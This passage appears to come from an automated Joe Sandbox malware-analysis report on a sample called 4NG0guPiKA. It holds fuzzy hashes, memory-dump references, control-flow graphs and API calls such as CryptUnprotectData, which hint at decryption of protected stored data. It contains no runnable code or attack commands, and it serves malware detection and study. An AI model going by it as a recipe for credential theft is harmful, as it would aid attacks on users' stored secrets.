                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Teq$pGq
                                                                                                            • API String ID: 0-4004436683
                                                                                                            • Opcode ID: d9d57d2b6dbdf63f443ed8f9d1ec4accd36265feeffc789bbbce06a77aa6dccb
                                                                                                            • Instruction ID: d61c65f2184d20e9bb9b3c73c4414749d6c7045bfd63717dbcd02dd487c28546
                                                                                                            • Opcode Fuzzy Hash: d9d57d2b6dbdf63f443ed8f9d1ec4accd36265feeffc789bbbce06a77aa6dccb
                                                                                                            • Instruction Fuzzy Hash: 3A72A374A01218DFDB65DF65C894BA9BBB2FB89300F1085E9D80AB7354CB719E82CF54
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PHq$PHq
                                                                                                            • API String ID: 0-1274609152
                                                                                                            • Opcode ID: 9489246368f92bda6fff731b1be45bd88a6d1a01efd37cbd93552aca34c7d10e
                                                                                                            • Instruction ID: aa817416184edf00799011008dd34869911cfee8a78392ef834c4819a8f48713
                                                                                                            • Opcode Fuzzy Hash: 9489246368f92bda6fff731b1be45bd88a6d1a01efd37cbd93552aca34c7d10e
                                                                                                            • Instruction Fuzzy Hash: 6991A374E002588FEB54DFA9D884A9DBBF2BF89300F14816AE419BB365DB349981CF51
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000B2,?,00000000,?,?,?,?), ref: 331EDA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: eaa86e37e50b940b7fb1c1dd9f57951356a8a04cfb18e1fe12e2807dc985fede
                                                                                                            • Instruction ID: 29a16742f774567dbe8a4b21b504206f887094fba0b03528922137a928bc8835
                                                                                                            • Opcode Fuzzy Hash: eaa86e37e50b940b7fb1c1dd9f57951356a8a04cfb18e1fe12e2807dc985fede
                                                                                                            • Instruction Fuzzy Hash: 9D1137B6800349DFDB10CF99C845BEEBBF4EF48320F148419E958A7210C379A990CFA5
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000B2,?,00000000,?,?,?,?), ref: 331EDA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: e42fb7028fcfed65d4e7b468b4f6fed0bc699a5bac02c95aae929c7913647622
                                                                                                            • Instruction ID: 78df1b8ec9a5cb09cd6090974ab6ca6466fd5d08080cff2280d8d65b3f33502f
                                                                                                            • Opcode Fuzzy Hash: e42fb7028fcfed65d4e7b468b4f6fed0bc699a5bac02c95aae929c7913647622
                                                                                                            • Instruction Fuzzy Hash: D61137B6804349DFDB10CF99C841BDEBBF4EF48320F148419E554A7210C73AA591DFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1eed5b46531ac5654e12126ab1667709b9ab71e56bc0a86e21493cd50703d18f
                                                                                                            • Instruction ID: c7a8a3d6b5472b1422e261ca88ab38eb7c394b55893157756c43eb8c89b4f11a
                                                                                                            • Opcode Fuzzy Hash: 1eed5b46531ac5654e12126ab1667709b9ab71e56bc0a86e21493cd50703d18f
                                                                                                            • Instruction Fuzzy Hash: 6472CDB8E052688FEB64DF69C984BDDBBB2BB49300F1485E9D409A7355DB309E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67fb1a458f4740b8b01bf4af2770f7e46eb1eab90f31b18bc065cba8ddb549ec
                                                                                                            • Instruction ID: 65d1aa1ff5baba823e48264478724dad74a585209b14445d1763d0486877f164
                                                                                                            • Opcode Fuzzy Hash: 67fb1a458f4740b8b01bf4af2770f7e46eb1eab90f31b18bc065cba8ddb549ec
                                                                                                            • Instruction Fuzzy Hash: F1E1D174E01258CFEB14CFA9C894B9DBBB2BF89300F2081AAD409B7395DB755A85CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4dd0ade1eca99a08de04b3a143715fa2013fbbcc480e22310089e7b9d0b9716f
                                                                                                            • Instruction ID: a40a24875db5452f560eb6bb9ba41473ffda8239e9da5b6c3bbffdd90f53b599
                                                                                                            • Opcode Fuzzy Hash: 4dd0ade1eca99a08de04b3a143715fa2013fbbcc480e22310089e7b9d0b9716f
                                                                                                            • Instruction Fuzzy Hash: C0D1CF74E01218CFEB14DFA9C994B9DBBB2FB88304F1081A9D809B7355DB759A82CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9f50ef6eb44c01838d690de7fa42f0679844aad419ff1cb291f2fa70f2b565f2
                                                                                                            • Instruction ID: 8850982fe16d181627b061014e3ea70089427f1b63904ac80e6577c7fcd31c67
                                                                                                            • Opcode Fuzzy Hash: 9f50ef6eb44c01838d690de7fa42f0679844aad419ff1cb291f2fa70f2b565f2
                                                                                                            • Instruction Fuzzy Hash: 6CA11274E00608CFEB10DFA9C984BDDBBB1FF89300F249269E448AB291DB759985CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a9063f6bac2e972b52053bc45b838d66c553c7e2c6571e34ef1337918d2b61a2
                                                                                                            • Instruction ID: 82236271568bc418b24dd8cfeaf16c22093df5b34c696c6430a21f4a61b47765
                                                                                                            • Opcode Fuzzy Hash: a9063f6bac2e972b52053bc45b838d66c553c7e2c6571e34ef1337918d2b61a2
                                                                                                            • Instruction Fuzzy Hash: 38A11274E00608CFEB10DFA9C944B9DBBB1BF88300F209269E408BB2A1DB759985CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 325ed094a77c90ce5db848aee58656d7080f0929500c5e42a8d228f98dcc854e
                                                                                                            • Instruction ID: ee9c419d5348e897a127cd70fcd521bc47b796efac8d04e7a0a257b3e571bdeb
                                                                                                            • Opcode Fuzzy Hash: 325ed094a77c90ce5db848aee58656d7080f0929500c5e42a8d228f98dcc854e
                                                                                                            • Instruction Fuzzy Hash: 83A1BEB4E052288FEB18CF6AC944B9DBBF2BF89300F14C5AAD409B7255DB744A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6433c857906e81814282ceb378d04926c0fe90bd6c24f83ffb8bb0c188b2a999
                                                                                                            • Instruction ID: b29a4a2cd47d42b3d34d07ddbd0f6bfaaaca6f85efc832b8d45774e162df4f49
                                                                                                            • Opcode Fuzzy Hash: 6433c857906e81814282ceb378d04926c0fe90bd6c24f83ffb8bb0c188b2a999
                                                                                                            • Instruction Fuzzy Hash: E6A1A0B5E012188FEB18CF6AC944B9EBBF2BF89300F14C5AAD449B7255DB705A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e5db412dedc4b11612a0d612570f5123a88de0f722d233f338f3044ba2570bf3
                                                                                                            • Instruction ID: b30ed18c3976bf4bdc2b191020711ad971225e3ebba5c4eb412974d5135fb587
                                                                                                            • Opcode Fuzzy Hash: e5db412dedc4b11612a0d612570f5123a88de0f722d233f338f3044ba2570bf3
                                                                                                            • Instruction Fuzzy Hash: 68A190B5E012188FEB58CF6AC944B9EBBF2BF89300F14C5AAD409B7255DB345A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b25d1ed4c4819b21b9f5ac58389ed0d06bc9a37259dfaf97895f10aaa611dd67
                                                                                                            • Instruction ID: fd4381c06f28fa0e0941737f411038b1985a8bf5527a7d57a8c5afb53193d80a
                                                                                                            • Opcode Fuzzy Hash: b25d1ed4c4819b21b9f5ac58389ed0d06bc9a37259dfaf97895f10aaa611dd67
                                                                                                            • Instruction Fuzzy Hash: F4A1A1B4E012188FEB18CF6AC944B9DBBF2BF89300F14C5AAD849B7255DB745A85CF14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 68416709321d962f0b7166c16b93fe8bfa4e43649fab2d5af7e6b4873efa5e66
                                                                                                            • Instruction ID: a2b165546680acfef03c5ea98a765dc24dac5f24a452f1b61c44e2e739427d14
                                                                                                            • Opcode Fuzzy Hash: 68416709321d962f0b7166c16b93fe8bfa4e43649fab2d5af7e6b4873efa5e66
                                                                                                            • Instruction Fuzzy Hash: A291F074D00608CFEB10DFA9C988BDCBBB1BF49311F249269E449AB291DB759981CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1719936f54faad25f9091b5943473cb4569bf2f87016e1f09858f96ab3adb9d0
                                                                                                            • Instruction ID: 03cb145562b7af0c698cb4903114270cb34fd3a5679931848d0bc5ae40d0efba
                                                                                                            • Opcode Fuzzy Hash: 1719936f54faad25f9091b5943473cb4569bf2f87016e1f09858f96ab3adb9d0
                                                                                                            • Instruction Fuzzy Hash: AF81D6B8E006088FEB14DFA9D9506DDBBF2BF88310F249529D814BB399DB345942CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93f62ee1c4fc6ee14beb20816d8606d574c451cc7085c6e69be197bb567ccc39
                                                                                                            • Instruction ID: ce007492c013ff118a1c8bbffcca741142a3d68ef187b702d65f9c4e521bd48a
                                                                                                            • Opcode Fuzzy Hash: 93f62ee1c4fc6ee14beb20816d8606d574c451cc7085c6e69be197bb567ccc39
                                                                                                            • Instruction Fuzzy Hash: 9E71BFB5D01268CFDB64CF6AC9847DDBBB2BB89300F1094AAD409B7254DB359A82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 415848181fcffc200d9919d679fc84a1bf59110b99f043341b3be0c00c542234
                                                                                                            • Instruction ID: ab656022f0a3950d7926901fc4e8b1596175e8f3306dd71aac9cd5955c3f35ab
                                                                                                            • Opcode Fuzzy Hash: 415848181fcffc200d9919d679fc84a1bf59110b99f043341b3be0c00c542234
                                                                                                            • Instruction Fuzzy Hash: 777194B4E006188FEB68CF6AC944B8DFAF2AF88300F14C5AAD40DB7255DB745A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e50460df9cf13cc54e859949097b74e9cbde1e2b20a9137521f293922d6c097e
                                                                                                            • Instruction ID: 7732253c49da0e6a29a1977991366b8b538dfdf3916d792a3cdb2a7418444b3f
                                                                                                            • Opcode Fuzzy Hash: e50460df9cf13cc54e859949097b74e9cbde1e2b20a9137521f293922d6c097e
                                                                                                            • Instruction Fuzzy Hash: B27174B5E016188FEB58CF6AC944B9EFBF2AF89300F14C5AAD40DA7255DB344A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0b24b1e1293b4073a3991d33578ae8aa1fda270c3731b9d95487f34db80ebf74
                                                                                                            • Instruction ID: 78c448a097c458e28bf53f50c3e1c4ea025648ff880562be583215f9d848146a
                                                                                                            • Opcode Fuzzy Hash: 0b24b1e1293b4073a3991d33578ae8aa1fda270c3731b9d95487f34db80ebf74
                                                                                                            • Instruction Fuzzy Hash: F24177B5E056188BEB58CF6BC9547C9FBF3AFC9200F04C1AAC54CA6265DB740A868F50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ade5de90b872204ea0c382cdfd813f50d09d9a62f82fa9792f48557dd0d197c0
                                                                                                            • Instruction ID: ccd947d9a67b4c2b23c145ce66215873eaab503b7e3a8a8fae97138e6d09b122
                                                                                                            • Opcode Fuzzy Hash: ade5de90b872204ea0c382cdfd813f50d09d9a62f82fa9792f48557dd0d197c0
                                                                                                            • Instruction Fuzzy Hash: D14169B5E016188BEB58CF6BC9457CDFAF3AFC9300F04C1AAD50CA6264DB740A868F51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 d7458-d7946 75 d794c-d795c 0->75 76 d7e98-d7ecd 0->76 75->76 77 d7962-d7972 75->77 80 d7ecf-d7ed4 76->80 81 d7ed9-d7ef7 76->81 77->76 79 d7978-d7988 77->79 79->76 82 d798e-d799e 79->82 83 d7fbe-d7fc3 80->83 93 d7f6e-d7f7a 81->93 94 d7ef9-d7f03 81->94 82->76 84 d79a4-d79b4 82->84 84->76 86 d79ba-d79ca 84->86 86->76 87 d79d0-d79e0 86->87 87->76 89 d79e6-d79f6 87->89 89->76 90 d79fc-d7a0c 89->90 90->76 92 d7a12-d7a22 90->92 92->76 95 d7a28-d7e97 92->95 99 d7f7c-d7f88 93->99 100 d7f91-d7f9d 93->100 94->93 101 d7f05-d7f11 94->101 99->100 107 d7f8a-d7f8f 99->107 108 d7f9f-d7fab 100->108 109 d7fb4-d7fb6 100->109 110 d7f36-d7f39 101->110 111 d7f13-d7f1e 101->111 107->83 108->109 121 d7fad-d7fb2 108->121 109->83 112 d7f3b-d7f47 110->112 113 d7f50-d7f5c 110->113 111->110 119 d7f20-d7f2a 111->119 112->113 125 d7f49-d7f4e 112->125 117 d7f5e-d7f65 113->117 118 d7fc4-d7fe6 113->118 117->118 122 d7f67-d7f6c 117->122 126 d7fe8 118->126 127 d7ff6 118->127 119->110 131 d7f2c-d7f31 119->131 121->83 122->83 125->83 126->127 129 d7fef-d7ff4 126->129 130 d7ff8-d7ff9 127->130 129->130 131->83
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (U$3X\$30a$3$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$NC2$$q$$q
                                                                                                            • API String ID: 0-1600392927
                                                                                                            • Opcode ID: 525d0e4594b7a49fe7fa3f55d3941be8a09e5602cfa1b28459a2b1e939cfd3e0
                                                                                                            • Instruction ID: 63c281c31564f5606b4af76f3ee4af1e74963054ae42ef8f3b3f76188d8ae826
                                                                                                            • Opcode Fuzzy Hash: 525d0e4594b7a49fe7fa3f55d3941be8a09e5602cfa1b28459a2b1e939cfd3e0
                                                                                                            • Instruction Fuzzy Hash: 99520434A0021C8FFB249BA4C855BAEB7B6EF88300F1081AAD10A7B765DF755E85DF51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 679 36450971-36450a0f GetCurrentProcess 684 36450a11-36450a17 679->684 685 36450a18-36450a4c GetCurrentThread 679->685 684->685 686 36450a55-36450a89 GetCurrentProcess 685->686 687 36450a4e-36450a54 685->687 689 36450a92-36450aaa 686->689 690 36450a8b-36450a91 686->690 687->686 701 36450aad call 36450f31 689->701 702 36450aad call 36450b51 689->702 690->689 692 36450ab3-36450ae2 GetCurrentThreadId 694 36450ae4-36450aea 692->694 695 36450aeb-36450b4d 692->695 694->695 701->692 702->692
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 364509FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 36450A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 36450A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 36450AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: a0ea31080311fd3664da9097ebfb98202c3c9027f5a43c20e41c8234a730a94e
                                                                                                            • Instruction ID: 6bcf0a9ba1bdb50756ee4d7104ab3676ccccdd1b194132765fd1e9d462e97c4f
                                                                                                            • Opcode Fuzzy Hash: a0ea31080311fd3664da9097ebfb98202c3c9027f5a43c20e41c8234a730a94e
                                                                                                            • Instruction Fuzzy Hash: C35166B4D003498FEB14DFAAC544BEEBBF1EF88304F208519E519B7260DB749941CB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 703 36450980-36450a0f GetCurrentProcess 707 36450a11-36450a17 703->707 708 36450a18-36450a4c GetCurrentThread 703->708 707->708 709 36450a55-36450a89 GetCurrentProcess 708->709 710 36450a4e-36450a54 708->710 712 36450a92-36450aaa 709->712 713 36450a8b-36450a91 709->713 710->709 724 36450aad call 36450f31 712->724 725 36450aad call 36450b51 712->725 713->712 715 36450ab3-36450ae2 GetCurrentThreadId 717 36450ae4-36450aea 715->717 718 36450aeb-36450b4d 715->718 717->718 724->715 725->715
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 364509FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 36450A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 36450A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 36450AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 23aa494587163e01a34e7b84b9d5fc4a894f593733c433c488b3465b83aa86b4
                                                                                                            • Instruction ID: 4e16c66bd36f98116fc767ed19b76069b13cb7ba0fb5b45bf1392a40e1f0926f
                                                                                                            • Opcode Fuzzy Hash: 23aa494587163e01a34e7b84b9d5fc4a894f593733c433c488b3465b83aa86b4
                                                                                                            • Instruction Fuzzy Hash: FC5156B4D002498FDB14DFAAC544BEEBBF1EF88300F208119E519B7360DB74A941CB65
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$hK$3K$3
                                                                                                            • API String ID: 0-2949761055
                                                                                                            • Opcode ID: ed51ac7d5b74cc8b2f00a0ae7b38d6c492b3db7cbfd8992166bb0c16e2ae5eec
                                                                                                            • Instruction ID: 83bd5e0e95b4da7b49b87f4d232ff7663fd4e2f892888e99b565429a2e6b285a
                                                                                                            • Opcode Fuzzy Hash: ed51ac7d5b74cc8b2f00a0ae7b38d6c492b3db7cbfd8992166bb0c16e2ae5eec
                                                                                                            • Instruction Fuzzy Hash: 12C1A0706047468FDB15CF68C484ABEBBF6AF85300B15C5AAE445DB352DB35ED42CBA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1278 35f2d548-35f2d66d 1297 35f2d673-35f2d6b9 1278->1297 1298 35f2d710-35f2d741 1278->1298 1303 35f2d6c4-35f2d70f 1297->1303 1304 35f2d6bb-35f2d6bf 1297->1304 1305 35f2d747-35f2d75e 1298->1305 1304->1303
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$49=^
                                                                                                            • API String ID: 0-634856703
                                                                                                            • Opcode ID: c356779e2feb4d16f5198680e7f5e5aec113386f22dbae74020f5a1d2d4460c5
                                                                                                            • Instruction ID: 2c54ada0118fa90b0294640d354a0e6e6b19b9033c73383d069a9d608bd69842
                                                                                                            • Opcode Fuzzy Hash: c356779e2feb4d16f5198680e7f5e5aec113386f22dbae74020f5a1d2d4460c5
                                                                                                            • Instruction Fuzzy Hash: DB51AF70E002099FDB04EFA8D865AEEBBB1FF89300F108665D405BB265DB75AD42CF91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2353 d4f00-d4f22 2354 d4f38-d4f43 2353->2354 2355 d4f24-d4f28 2353->2355 2358 d4f49-d4f4b 2354->2358 2359 d4feb-d5017 2354->2359 2356 d4f2a-d4f36 2355->2356 2357 d4f50-d4f57 2355->2357 2356->2354 2356->2357 2360 d4f59-d4f60 2357->2360 2361 d4f77-d4f80 2357->2361 2362 d4fe3-d4fe8 2358->2362 2365 d501e-d5076 2359->2365 2360->2361 2363 d4f62-d4f6d 2360->2363 2454 d4f82 call d4ef0 2361->2454 2455 d4f82 call d4f00 2361->2455 2363->2365 2366 d4f73-d4f75 2363->2366 2385 d5078-d507e 2365->2385 2386 d5085-d5097 2365->2386 2366->2362 2367 d4f88-d4f8a 2368 d4f8c-d4f90 2367->2368 2369 d4f92-d4f9a 2367->2369 2368->2369 2372 d4fad-d4fcc 2368->2372 2373 d4f9c-d4fa1 2369->2373 2374 d4fa9-d4fab 2369->2374 2379 d4fce-d4fd7 2372->2379 2380 d4fe1 2372->2380 2373->2374 2374->2362 2458 d4fd9 call d9f6d 2379->2458 2459 d4fd9 call d9eb0 2379->2459 2380->2362 2382 d4fdf 2382->2362 2385->2386 2388 d509d-d50a1 2386->2388 2389 d512b-d512d 2386->2389 2390 d50b1-d50be 2388->2390 2391 d50a3-d50af 2388->2391 2456 d512f call d52b8 2389->2456 2457 d512f call d52c8 2389->2457 2399 d50c0-d50ca 2390->2399 2391->2399 2392 d5135-d513b 2393 d513d-d5143 2392->2393 2394 d5147-d514e 2392->2394 2397 d51a9-d5208 2393->2397 2398 d5145 2393->2398 2413 d520f-d5233 2397->2413 2398->2394 2402 d50cc-d50db 2399->2402 2403 d50f7-d50fb 2399->2403 2411 d50dd-d50e4 2402->2411 2412 d50eb-d50f5 2402->2412 2404 d50fd-d5103 2403->2404 2405 d5107-d510b 2403->2405 2408 d5105 2404->2408 2409 d5151-d51a2 2404->2409 2405->2394 2410 d510d-d5111 2405->2410 2408->2394 2409->2397 2410->2413 2414 d5117-d5129 2410->2414 2411->2412 2412->2403 2422 d5239-d523b 2413->2422 2423 d5235-d5237 2413->2423 2414->2394 2426 d523d-d5241 2422->2426 2427 d524c-d524e 2422->2427 2425 d52b1-d52b4 2423->2425 2432 d5247-d524a 2426->2432 2433 d5243-d5245 2426->2433 2429 d5261-d5267 2427->2429 2430 d5250-d5254 2427->2430 2437 d5269-d5290 2429->2437 2438 d5292-d5294 2429->2438 2435 d525a-d525f 2430->2435 2436 